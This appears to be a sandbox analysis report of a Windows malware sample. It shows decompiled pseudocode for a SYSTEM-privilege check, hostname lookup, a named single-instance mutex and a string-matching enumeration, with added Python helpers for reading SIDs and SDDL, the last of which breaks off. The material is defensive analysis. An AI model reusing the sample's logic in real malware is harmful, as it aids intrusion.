                          																		_push( *0x6f9bb8);
                          																		E006F68E0();
                          																		_t522 = _t521 + 0x10;
                          																		L31:
                          																		_t412 = 0;
                          																		 *0x6f9bf8 = 2;
                          																		L33:
                          																		_t413 = _t412 + 1;
                          																		__eflags = _t413;
                          																	} else {
                          																		E006F4520( *0x6f9bb8, 0x65);
                          																		_t532 = _t527 + 8;
                          																		 *0x6f9bf8 = 3;
                          																		_t413 = 1;
                          																		goto L26;
                          																	}
                          																	goto L34;
                          																}
                          															} else {
                          																__eflags = 0;
                          																if(0 == 0) {
                          																	goto L66;
                          																} else {
                          																	goto L47;
                          																}
                          															}
                          														}
                          													}
                          												} else {
                          													E006F4520( *0x6f9bb8, 0x21);
                          													_t532 = _t527 + 8;
                          													__eflags =  *0x6f9ae8;
                          													_t500 = _a4;
                          													 *0x6f9bf8 = 3;
                          													_t151 =  *0x6f9ae8 != 0;
                          													__eflags = _t151;
                          													_t413 = 0 | _t151;
                          													L26:
                          													E006E3240(_v1300, _t500, 1);
                          													_t522 = _t532 + 0xc;
                          													L34:
                          													_t291 = _v1024;
                          													__eflags = _t291;
                          													if(_t291 != 0) {
                          														 *((intOrPtr*)( *_t291 + 8))(_t291);
                          													}
                          													_t292 = _v1080;
                          													__eflags = _t292;
                          													if(_t292 != 0) {
                          														 *((intOrPtr*)( *_t292 + 8))(_t292);
                          													}
                          													_t293 = _v1036;
                          													__eflags = _t293;
                          													if(_t293 != 0) {
                          														E006E91E0(_t293);
                          													}
                          													return _t413;
                          												}
                          											}
                          										} else {
                          											__eflags = 0;
                          											if(0 == 0) {
                          												goto L66;
                          											} else {
                          												goto L11;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					_t536 =  *0x6f9bf4;
                          					if( *0x6f9bf4 == 0) {
                          						E006F4520( *0x6f9bb8, 0x6b);
                          						__eflags = 0;
                          						 *0x6f9bf8 = 0;
                          						return 0;
                          					} else {
                          						_push(_a4);
                          						return E006EDF00(_t536);
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: c5e745150f39a0cd6dd33e9283d45550484b6e7634fd06d5e136477f5079be97
                          • Instruction ID: ad53afd8c46e25f18444f5afea070d6616364146827d76dd66653788731780a1
                          • Opcode Fuzzy Hash: c5e745150f39a0cd6dd33e9283d45550484b6e7634fd06d5e136477f5079be97
                          • Instruction Fuzzy Hash: 613216B5A09380AFD764DF55D880B9BBBE6FF88744F10882DFA8983351E7319944CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 77%
                          			E006E3240(intOrPtr* _a4, WCHAR* _a8, intOrPtr _a12) {
                          				void* _v16;
                          				char _v236;
                          				intOrPtr _v248;
                          				intOrPtr _v252;
                          				intOrPtr _v256;
                          				intOrPtr _v260;
                          				char _v264;
                          				intOrPtr _v272;
                          				intOrPtr* _v276;
                          				intOrPtr _v280;
                          				char _v284;
                          				char _v288;
                          				intOrPtr _v292;
                          				intOrPtr* _v296;
                          				intOrPtr _v300;
                          				intOrPtr _v304;
                          				intOrPtr _v308;
                          				char _v312;
                          				short _v316;
                          				intOrPtr _v320;
                          				char _v328;
                          				char _v332;
                          				intOrPtr* _v336;
                          				void* _v340;
                          				intOrPtr* _v344;
                          				intOrPtr _v348;
                          				intOrPtr* _v352;
                          				intOrPtr* _v356;
                          				char _v360;
                          				WCHAR* _v364;
                          				WCHAR* _v368;
                          				WCHAR* _v372;
                          				WCHAR* _v376;
                          				intOrPtr* _t102;
                          				intOrPtr _t104;
                          				intOrPtr* _t105;
                          				intOrPtr* _t107;
                          				intOrPtr* _t109;
                          				void* _t110;
                          				intOrPtr* _t111;
                          				intOrPtr* _t113;
                          				intOrPtr* _t115;
                          				void* _t117;
                          				void* _t120;
                          				intOrPtr* _t121;
                          				intOrPtr* _t123;
                          				void* _t126;
                          				intOrPtr* _t128;
                          				void* _t129;
                          				intOrPtr* _t130;
                          				intOrPtr* _t132;
                          				void* _t133;
                          				intOrPtr* _t144;
                          				char* _t148;
                          				WCHAR* _t149;
                          				intOrPtr* _t153;
                          				intOrPtr _t162;
                          				intOrPtr _t163;
                          				intOrPtr* _t172;
                          				intOrPtr _t180;
                          				short _t181;
                          				intOrPtr* _t186;
                          				intOrPtr* _t188;
                          				char* _t191;
                          				signed int _t193;
                          				void* _t195;
                          
                          				_t195 = (_t193 & 0xfffffff8) - 0x128;
                          				_t172 = _a4;
                          				_t102 =  &_v264;
                          				 *_t102 = 0;
                          				_push(_t102);
                          				_push(1);
                          				_push(_t172);
                          				if( *((intOrPtr*)( *_t172 + 0x38))() < 0) {
                          					_t104 = 0;
                          					L26:
                          					return _t104;
                          				}
                          				_t105 = _v276;
                          				_t186 =  &_v236;
                          				 *_t186 = 0;
                          				 *((intOrPtr*)( *_t105 + 0x1c))(_t105, _t186);
                          				_v320 = 0;
                          				if( *_t186 <= 0) {
                          					L20:
                          					_t107 = _v284;
                          					 *((intOrPtr*)( *_t107 + 8))(_t107);
                          					_t153 = _a4;
                          					_t109 =  &_v332;
                          					 *_t109 = 0;
                          					_t110 =  *((intOrPtr*)( *_t153 + 0x28))(_t153, 0, _t109);
                          					_t104 = 0;
                          					if(_t110 < 0) {
                          						goto L26;
                          					}
                          					_t111 = _v344;
                          					_t180 = 0;
                          					_t188 =  &_v340;
                          					 *_t188 = 0;
                          					 *((intOrPtr*)( *_t111 + 0x1c))(_t111, _t188);
                          					if( *_t188 <= 0) {
                          						L25:
                          						_t113 = _v352;
                          						 *((intOrPtr*)( *_t113 + 8))(_t113);
                          						_t104 = _v348;
                          						goto L26;
                          					} else {
                          						goto L22;
                          					}
                          					do {
                          						L22:
                          						_t181 = _t180 + 1;
                          						_v340 = 3;
                          						_t115 = _v352;
                          						_v312 = 0;
                          						_v332 = _t181;
                          						_v292 = _t181;
                          						_v316 = _t181;
                          						_v296 = _v336;
                          						_v288 = _v328;
                          						_v300 = _v340;
                          						_v320 =  *_t115;
                          						_t117 =  *((intOrPtr*)(_v320 + 0x20))(_t115, _v300, _v296, _v292, _v288,  &_v312);
                          						 *0x6f9ddc( &_v364);
                          						if(_t117 >= 0) {
                          							_t120 = E006E3240(_v340, _a8, _a12);
                          							_t195 = _t195 + 0xc;
                          							_v372 = _v372 + _t120;
                          							_t121 = _v340;
                          							 *((intOrPtr*)( *_t121 + 8))(_t121);
                          						}
                          						_t180 = _v344;
                          					} while (_t180 < _v376);
                          					goto L25;
                          				}
                          				_t162 = 0;
                          				_t191 =  &_v316;
                          				_v320 = 0;
                          				do {
                          					_t163 = _t162 + 1;
                          					_v316 = 3;
                          					_t123 = _v284;
                          					_v328 = 0;
                          					_t148 = _t191;
                          					_v308 = _t163;
                          					_v280 = _t163;
                          					_v252 = _t163;
                          					_v296 = _t123;
                          					_v256 = _v312;
                          					_v248 = _v304;
                          					_v260 = _v316;
                          					_v292 =  *_t123;
                          					_t126 =  *((intOrPtr*)(_v292 + 0x20))(_v296, _v260, _v256, _v252, _v248,  &_v328);
                          					 *0x6f9ddc(_t148);
                          					if(_t126 < 0) {
                          						_t162 = _v308;
                          						_t191 = _t148;
                          						goto L19;
                          					}
                          					_t128 = _v356;
                          					_v344 = 0;
                          					_t129 =  *((intOrPtr*)( *_t128 + 0x1c))(_t128, _t148);
                          					_t191 = _t148;
                          					if(_t129 < 0) {
                          						L18:
                          						_t130 = _v364;
                          						 *((intOrPtr*)( *_t130 + 8))(_t130);
                          						_t162 = _v320;
                          						goto L19;
                          					}
                          					_t132 = _v364;
                          					_v360 = 0;
                          					_t133 =  *((intOrPtr*)( *_t132 + 0x50))(_t132,  &_v360);
                          					_t149 =  &_v284;
                          					if(_t133 < 0) {
                          						L17:
                          						 *((intOrPtr*)( *0x6f9dd8))(_v360);
                          						goto L18;
                          					}
                          					if(StrStrIW(_v368, _a8) == 0) {
                          						L16:
                          						 *0x6f9dd8(_v372);
                          						goto L17;
                          					}
                          					E006F4520(_t149, 0x20);
                          					_t195 = _t195 + 8;
                          					if(lstrcmpW(_v364, _t149) == 0) {
                          						E006F4520(_t149, 0x21);
                          						_t195 = _t195 + 8;
                          						if(StrStrIW(_v372, _t149) != 0) {
                          							L15:
                          							_v372 =  &(_v372[0x200]);
                          							goto L16;
                          						}
                          						E006F4520(_t149, 0x22);
                          						_t195 = _t195 + 8;
                          						if(StrStrIW(_v376, _t149) == 0) {
                          							_v376 =  &(_v376[0]);
                          							goto L16;
                          						}
                          						goto L15;
                          					}
                          					if(_a12 != 0) {
                          						_t144 = _a4;
                          						 *((intOrPtr*)( *_t144 + 0x3c))(_t144, _v364, 0);
                          					}
                          					goto L16;
                          					L19:
                          				} while (_t162 < _v272);
                          				goto L20;
                          			}
                          0x006e3249
                          0x006e324f
                          0x006e3252
                          0x006e3256
                          0x006e325e
                          0x006e325f
                          0x006e3261
                          0x006e3267
                          0x006e329c
                          0x006e350b
                          0x006e3512
                          0x006e3512
                          0x006e3269
                          0x006e326f
                          0x006e3273
                          0x006e3279
                          0x006e327e
                          0x006e3286
                          0x006e3418
                          0x006e3418
                          0x006e341f
                          0x006e3422
                          0x006e3425
                          0x006e342b
                          0x006e3434
                          0x006e3439
                          0x006e343e
                          0x00000000
                          0x00000000
                          0x006e3444
                          0x006e3448
                          0x006e344a
                          0x006e344e
                          0x006e3454
                          0x006e3459
                          0x006e34fd
                          0x006e34fd
                          0x006e3504
                          0x006e3507
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x006e345f
                          0x006e345f
                          0x006e345f
                          0x006e3460
                          0x006e3467
                          0x006e346b
                          0x006e3473
                          0x006e3477
                          0x006e347b
                          0x006e3487
                          0x006e348f
                          0x006e3493
                          0x006e3499
                          0x006e34bb
                          0x006e34c5
                          0x006e34cd
                          0x006e34d9
                          0x006e34de
                          0x006e34e1
                          0x006e34e5
                          0x006e34ec
                          0x006e34ec
                          0x006e34ef
                          0x006e34f3
                          0x00000000
                          0x006e345f
                          0x006e328c
                          0x006e328e
                          0x006e3292
                          0x006e32ac
                          0x006e32ac
                          0x006e32ad
                          0x006e32b4
                          0x006e32b8
                          0x006e32c0
                          0x006e32c2
                          0x006e32c6
                          0x006e32ca
                          0x006e32d6
                          0x006e32da
                          0x006e32e2
                          0x006e32e6
                          0x006e32ec
                          0x006e3311
                          0x006e3317
                          0x006e331f
                          0x006e33ab
                          0x006e33af
                          0x00000000
                          0x006e33af
                          0x006e3325
                          0x006e3329
                          0x006e3335
                          0x006e333a
                          0x006e333c
                          0x006e3400
                          0x006e3400
                          0x006e3407
                          0x006e340a
                          0x00000000
                          0x006e340a
                          0x006e3342
                          0x006e3346
                          0x006e3356
                          0x006e335b
                          0x006e335f
                          0x006e33f5
                          0x006e33fe
                          0x00000000
                          0x006e33fe
                          0x006e3376
                          0x006e33eb
                          0x006e33ef
                          0x00000000
                          0x006e33ef
                          0x006e337b
                          0x006e3380
                          0x006e3390
                          0x006e33b6
                          0x006e33bb
                          0x006e33c7
                          0x006e33e3
                          0x006e33e3
                          0x00000000
                          0x006e33e3
                          0x006e33cc
                          0x006e33d1
                          0x006e33dd
                          0x006e32a3
                          0x00000000
                          0x006e32a3
                          0x00000000
                          0x006e33dd
                          0x006e3396
                          0x006e3398
                          0x006e33a6
                          0x006e33a6
                          0x00000000
                          0x006e340e
                          0x006e340e
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ClearVariant$FreeStringlstrcmp
                          • String ID:
                          • API String ID: 1296292621-0
                          • Opcode ID: 51eca568c39bf27634327692640947266b83e5daea070c290f48f9e5598fcc6b
                          • Instruction ID: e55c15859d331b2c1cccd67a8f892e71c456e9cbd0209e166bb52b6124e09e99
                          • Opcode Fuzzy Hash: 51eca568c39bf27634327692640947266b83e5daea070c290f48f9e5598fcc6b
                          • Instruction Fuzzy Hash: 2391E0B5609351AFC704CF15C888A5ABBEAEFC8714F10891DF98987360DB71ED05CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

Basic blocks (id: address range, API calls -> successor blocks):
• 507: 6e3a80-6e3abb GetCurrentProcess OpenProcessToken -> 508, 509
• 508: 6e3abd-6e3ad7 GetTokenInformation -> 509, 510
• 509: 6e3b07-6e3b0c -> 511, 512
• 510: 6e3ad9-6e3af6 AllocateAndInitializeSid -> 509, 513
• 511: 6e3b0e-6e3b0f FreeSid -> 512
• 512: 6e3b15-6e3b1b -> 514, 515
• 513: 6e3af8-6e3b05 EqualSid -> 509
• 514: 6e3b1d-6e3b1e CloseHandle -> 515
• 515: 6e3b24-6e3b2b (no successors)
                          C-Code - Quality: 100%
                          			E006E3A80() {
                          				void _v84;
                          				long _v88;
                          				short _v92;
                          				void* _v96;
                          				struct _SID_IDENTIFIER_AUTHORITY _v100;
                          				void* _t12;
                          				void* _t15;
                          				void* _t16;
                          				int _t21;
                          				HANDLE* _t27;
                          				int _t28;
                          				PSID* _t29;
                          
                          				_t29 =  &_v96;
                          				_t28 = 0;
                          				_t27 =  &_v100;
                          				 *_t27 = 0;
                          				_v88 = 0;
                          				 *_t29 = 0;
                          				_v92 =  *0x6f9a90 & 0x0000ffff;
                          				_t12 =  *0x6f9a8c; // 0x0
                          				_v96 = _t12;
                          				if(OpenProcessToken(GetCurrentProcess(), 8, _t27) != 0) {
                          					_t21 = GetTokenInformation(_v100.Value, 1,  &_v84, 0x4c,  &_v88); // executed
                          					if(_t21 != 0) {
                          						_t28 = 0;
                          						if(AllocateAndInitializeSid( &_v100, 1, 0x12, 0, 0, 0, 0, 0, 0, 0, _t29) != 0) {
                          							_t28 = EqualSid(_v88,  *_t29);
                          						}
                          					}
                          				}
                          				_t15 =  *_t29;
                          				if(_t15 != 0) {
                          					FreeSid(_t15);
                          				}
                          				_t16 = _v100;
                          				if(_t16 != 0) {
                          					CloseHandle(_t16); // executed
                          				}
                          				return _t28;
                          			}

                          0x006e3a82
                          0x006e3a8c
                          0x006e3a8e
                          0x006e3a92
                          0x006e3a94
                          0x006e3a98
                          0x006e3a9b
                          0x006e3aa0
                          0x006e3aa5
                          0x006e3abb
                          0x006e3acf
                          0x006e3ad7
                          0x006e3adb
                          0x006e3af6
                          0x006e3b05
                          0x006e3b05
                          0x006e3af6
                          0x006e3ad7
                          0x006e3b07
                          0x006e3b0c
                          0x006e3b0f
                          0x006e3b0f
                          0x006e3b15
                          0x006e3b1b
                          0x006e3b1e
                          0x006e3b1e
                          0x006e3b2b

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 006E3AA9
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E3AB3
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),?,0000004C,?), ref: 006E3ACF
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E3AEE
                          • EqualSid.ADVAPI32(?), ref: 006E3AFF
                          • FreeSid.ADVAPI32(00000000), ref: 006E3B0F
                          • CloseHandle.KERNELBASE(?), ref: 006E3B1E
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpen
                          • String ID:
                          • API String ID: 3347031116-0
                          • Opcode ID: a7fce65378fbb4ce80914347f6d507f085294ef5bd08a472441a48dacb1ed45f
                          • Instruction ID: ae0e64b5d8407a8d721a4dadf25ec68bffb6ec4ab676bbfc4dfdd61343045a12
                          • Opcode Fuzzy Hash: a7fce65378fbb4ce80914347f6d507f085294ef5bd08a472441a48dacb1ed45f
                          • Instruction Fuzzy Hash: F3116D71204361ABDB209F25ED09F6BBBEAFF94B41F004819F885D3290E770C904CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%
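E006E3A80 above queries TokenUser (TOKEN_INFORMATION_CLASS value 1, not TokenIntegrityLevel, which is 25) into a 0x4c-byte buffer, builds a one-sub-authority SID with RID 0x12 via AllocateAndInitializeSid, and compares the two with EqualSid. If the 6-byte identifier authority it loads from 0x6f9a8c/0x6f9a90 is SECURITY_NT_AUTHORITY (the report does not show those bytes, so this is an assumption), the comparison SID is S-1-5-18, LocalSystem, and the function answers "am I running as SYSTEM". The following Python is an added example written for this report, not code from the sample or from Joe Sandbox: it lays out binary SIDs and TOKEN_USER / TOKEN_MANDATORY_LABEL buffers the way a 32-bit process sees them, so the 0x12 and the 0x4c buffer can be read directly. The buffer base address and the SIDs inside it are constructed test data.

```python
import struct

# Identifier authorities, the 6-byte big-endian field of a binary SID.
SECURITY_NT_AUTHORITY = 5                 # S-1-5-...
SECURITY_MANDATORY_LABEL_AUTHORITY = 16   # S-1-16-... (integrity labels)
SECURITY_LOCAL_SYSTEM_RID = 0x12          # 18: the sub-authority the sample passes to AllocateAndInitializeSid

# TOKEN_INFORMATION_CLASS values relevant to the report.
TOKEN_USER = 1
TOKEN_INTEGRITY_LEVEL = 25


def build_sid(authority, *sub_authorities):
    """Binary SID: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
    SubAuthority[n] (DWORD little-endian each). Mirrors AllocateAndInitializeSid."""
    if not 1 <= len(sub_authorities) <= 15:
        raise ValueError("SID must have 1..15 sub-authorities")
    return (bytes([1, len(sub_authorities)])
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def parse_sid(blob, offset=0):
    """Return (sid_string, byte_length) for the SID starting at blob[offset]."""
    revision, count = blob[offset], blob[offset + 1]
    if revision != 1 or not 1 <= count <= 15:
        raise ValueError("not a valid SID header")
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, offset + 8)
    return "S-1-%d-%s" % (authority, "-".join(map(str, subs))), 8 + 4 * count


def sids_equal(a, b):
    """EqualSid semantics: same length and identical bytes."""
    return len(a) == len(b) and a == b


def sid_from_token_buffer(buf, base_address):
    """Extract the SID from a TOKEN_USER or TOKEN_MANDATORY_LABEL buffer of a 32-bit process.
    Both start with SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes}; Sid is an absolute
    pointer into the same buffer, so the buffer's own address gives the offset."""
    sid_ptr, _attributes = struct.unpack_from("<II", buf, 0)
    offset = sid_ptr - base_address
    if not 0 <= offset < len(buf):
        raise ValueError("SID pointer does not point into the buffer")
    _, length = parse_sid(buf, offset)
    return buf[offset:offset + length]


def is_local_system(token_user_buf, base_address):
    """The check E006E3A80 performs (assuming the NT authority): TokenUser SID == S-1-5-18."""
    return sids_equal(sid_from_token_buffer(token_user_buf, base_address),
                      build_sid(SECURITY_NT_AUTHORITY, SECURITY_LOCAL_SYSTEM_RID))


def integrity_level(token_label_buf, base_address):
    """What class 25 (TokenIntegrityLevel) would have returned: the RID of the S-1-16-x label."""
    sid_str, _ = parse_sid(sid_from_token_buffer(token_label_buf, base_address))
    return int(sid_str.rsplit("-", 1)[1])


def make_token_buffer(sid, base_address):
    """Constructed test data: SID_AND_ATTRIBUTES followed by the SID, as the kernel lays it out."""
    return struct.pack("<II", base_address + 8, 0) + sid


# Constructed sample values: hypothetical stack address and SIDs, not taken from the report.
BASE = 0x0012FF00
SYSTEM_BUF = make_token_buffer(build_sid(SECURITY_NT_AUTHORITY, 18), BASE)
USER_BUF = make_token_buffer(build_sid(SECURITY_NT_AUTHORITY, 21, 1111, 2222, 3333, 1001), BASE)
HIGH_LABEL_BUF = make_token_buffer(build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, 0x3000), BASE)

if __name__ == "__main__":
    print(parse_sid(build_sid(5, 18))[0], is_local_system(SYSTEM_BUF, BASE))
    print(parse_sid(sid_from_token_buffer(USER_BUF, BASE))[0], is_local_system(USER_BUF, BASE))
    print(hex(integrity_level(HIGH_LABEL_BUF, BASE)))
```

When the authority bytes at 0x6f9a8c/0x6f9a90 are recovered from the dump, feed them to build_sid instead of SECURITY_NT_AUTHORITY to confirm which well-known SID the sample really compares against.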

                          Control-flow Graph

Basic blocks (id: address range, API calls -> successor blocks):
• 605: 6e5370-6e539a WSAStartup -> 606, 607
• 606: 6e544f-6e5460 WSACleanup (no successors)
• 607: 6e53a0-6e53b2 gethostname -> 606, 608
• 608: 6e53b8-6e53cf getaddrinfo -> 609, 610
• 609: 6e543f-6e5441 -> 606, 611
• 610: 6e53d1-6e53d3 -> 612, 613
• 611: 6e5443-6e544a FreeAddrInfoW -> 606
• 612: 6e544c-6e544e -> 606
• 613: 6e53d5-6e53db -> 614
• 614: 6e53dc-6e53e0 -> 615, 616
• 615: 6e5434 -> 617
• 616: 6e53e2-6e53ed -> 618, 619
• 617: 6e5436-6e543d -> 609, 614
• 618: 6e53ef-6e53f2 -> 622, 623
• 619: 6e5409-6e540c -> 620, 621
• 620: 6e540e-6e5411 -> 617, 624
• 621: 6e5426-6e5432 -> 615, 617
• 622: 6e53f4-6e53f7 -> 615, 625
• 623: 6e5415-6e5424 -> 615
• 624: 6e5413 -> 615
• 625: 6e53f9-6e5405 -> 615, 626
• 626: 6e5407 -> 617
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 006E538D
                          • gethostname.WS2_32(?,000000FF), ref: 006E53AA
                          • getaddrinfo.WS2_32(?,00000000,00000000), ref: 006E53C0
                          • FreeAddrInfoW.WS2_32(00000000), ref: 006E5444
                          • WSACleanup.WS2_32 ref: 006E544F
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: AddrCleanupFreeInfoStartupgetaddrinfogethostname
                          • String ID:
                          • API String ID: 2736887295-0
                          • Opcode ID: ba4a26c71ed5204de49e64ad495ae945d2ed72ad5309b03a45de4ffa0bf4b47f
                          • Instruction ID: 0cdebd5e1caccc597cb891c0dbbfbd478746a11a5cf018ced9890fbf24933491
                          • Opcode Fuzzy Hash: ba4a26c71ed5204de49e64ad495ae945d2ed72ad5309b03a45de4ffa0bf4b47f
                          • Instruction Fuzzy Hash: E321C572A43B96DBEB304A268C4C7F662E79B4532AF590135DD13863E1D7748CC38652
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

Basic blocks (id: address range, API calls -> successor blocks):
• 627: 6e7340-6e7356 -> 628, 629
• 628: 6e7358-6e735f CloseHandle -> 629
• 629: 6e7365-6e7384 call 6f4520 ConvertStringSecurityDescriptorToSecurityDescriptorW -> 632, 633
• 632: 6e738f-6e7393 -> 634
• 633: 6e7386-6e738d -> 634
• 634: 6e739a-6e73c8 call 6f3200 CreateMutexW -> 637, 638
• 637: 6e73ca-6e73d1 LocalFree -> 638
• 638: 6e73d3-6e73d5 -> 639, 640
• 639: 6e73e9 -> 642
• 640: 6e73d7-6e73e2 GetLastError -> 639, 641
• 641: 6e73e4-6e73e7 -> 642
• 642: 6e73eb-6e73f4 (no successors)
                          C-Code - Quality: 64%
                          			E006E7340(void** __ecx) {
                          				char _v212;
                          				void* _v232;
                          				void* _v236;
                          				char _v240;
                          				void* _t6;
                          				void* _t9;
                          				void* _t10;
                          				void* _t12;
                          				struct _SECURITY_ATTRIBUTES* _t19;
                          				void* _t21;
                          				WCHAR* _t22;
                          				void** _t23;
                          				void** _t24;
                          				void** _t25;
                          
                          				 *_t24 = 0;
                          				_t23 = __ecx;
                          				_t6 =  *__ecx;
                          				if(_t6 != 0) {
                          					CloseHandle(_t6);
                          					 *_t23 = 0;
                          				}
                          				_t22 =  &_v212;
                          				E006F4520(_t22, 0x25);
                          				_t25 =  &(_t24[2]);
                          				_t9 =  *0x6f9e54(_t22, 1, _t25, 0); // executed
                          				_t28 = _t9;
                          				if(_t9 == 0) {
                          					_t10 = 0;
                          					_t19 = 0;
                          					__eflags = 0;
                          					 *_t25 = 0;
                          				} else {
                          					_t10 =  *_t25;
                          					_t19 =  &_v240;
                          				}
                          				_v240 = 0xc;
                          				_v232 = 0;
                          				_v236 = _t10;
                          				_push(_t22);
                          				E006F3200(_t28);
                          				_t12 = CreateMutexW(_t19, 1, _t22); // executed
                          				 *_t23 = _t12;
                          				_t21 = _t25[1];
                          				if(_t21 != 0) {
                          					LocalFree(_t21);
                          					_t12 =  *_t23;
                          				}
                          				if(_t12 == 0 || GetLastError() != 0xb7) {
                          					__eflags = 0;
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}

                          0x006e7349
                          0x006e7350
                          0x006e7352
                          0x006e7356
                          0x006e7359
                          0x006e735f
                          0x006e735f
                          0x006e7365
                          0x006e736c
                          0x006e7371
                          0x006e737c
                          0x006e7382
                          0x006e7384
                          0x006e738f
                          0x006e7391
                          0x006e7391
                          0x006e7393
                          0x006e7386
                          0x006e7386
                          0x006e7389
                          0x006e7389
                          0x006e739a
                          0x006e73a2
                          0x006e73aa
                          0x006e73ae
                          0x006e73af
                          0x006e73bb
                          0x006e73c1
                          0x006e73c3
                          0x006e73c8
                          0x006e73cb
                          0x006e73d1
                          0x006e73d1
                          0x006e73d5
                          0x006e73e9
                          0x00000000
                          0x006e73e4
                          0x00000000
                          0x006e73e6

                          APIs
                          • CloseHandle.KERNEL32(00000000), ref: 006E7359
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 006E737C
                          • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 006E73BB
                          • LocalFree.KERNEL32 ref: 006E73CB
                          • GetLastError.KERNEL32 ref: 006E73D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$CloseConvertCreateErrorFreeHandleLastLocalMutexString
                          • String ID:
                          • API String ID: 1087375019-0
                          • Opcode ID: f9376a107140a1fcabd8f9070cab89ed47bedf914e6ac0a35c5d3b115730643d
                          • Instruction ID: 7cc22c60dc2d2fd5e759c905d3fe79999df5caf1fbaf39a1bd1b7863d9fbcbc2
                          • Opcode Fuzzy Hash: f9376a107140a1fcabd8f9070cab89ed47bedf914e6ac0a35c5d3b115730643d
                          • Instruction Fuzzy Hash: 21117770219341ABE7609F65DC89B7B7BEAEF80701F00482CF985D6380EB798844DB62
                          Uniqueness

                          Uniqueness Score: -1.00%
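E006E7340 above decrypts a string at runtime (E006F4520 with index 0x25; the plaintext is not shown in this report), passes it to ConvertStringSecurityDescriptorToSecurityDescriptorW as SDDL, wraps the result in a SECURITY_ATTRIBUTES of length 0xc, and creates a named mutex with it. The return value is 1 only when CreateMutexW succeeded and GetLastError() is 0xb7 (ERROR_ALREADY_EXISTS), i.e. another instance already holds the name. Once the decrypted string has been dumped, the analyst needs to read it as SDDL to see who can open that mutex. The following Python SDDL reader and in-order DACL walk is an added example for this report, not code from the sample or from Joe Sandbox. The two SDDL strings in it are constructed, the vocabulary tables are subsets of what Windows accepts, and the walk simplifies AccessCheck (one SID, no group expansion, only GENERIC_ALL mapped, and an absent DACL treated as granting nothing rather than everything as a real NULL DACL does).

```python
import re

# Subsets of the SDDL vocabulary (Windows defines many more of each).
SID_ALIASES = {"WD": "S-1-1-0", "SY": "S-1-5-18", "BA": "S-1-5-32-544",
               "BU": "S-1-5-32-545", "AU": "S-1-5-11", "IU": "S-1-5-4", "AN": "S-1-5-7"}
RIGHTS = {"GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
          "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT",
             "ML": "SYSTEM_MANDATORY_LABEL"}
ACL_FLAGS = ("AR", "AI", "P")            # two-letter tokens first so "AI" is not read as "A" "I"
SECTION_RE = re.compile(r"([OGDS]):")    # section keys; neither SIDs nor ACEs contain ':'
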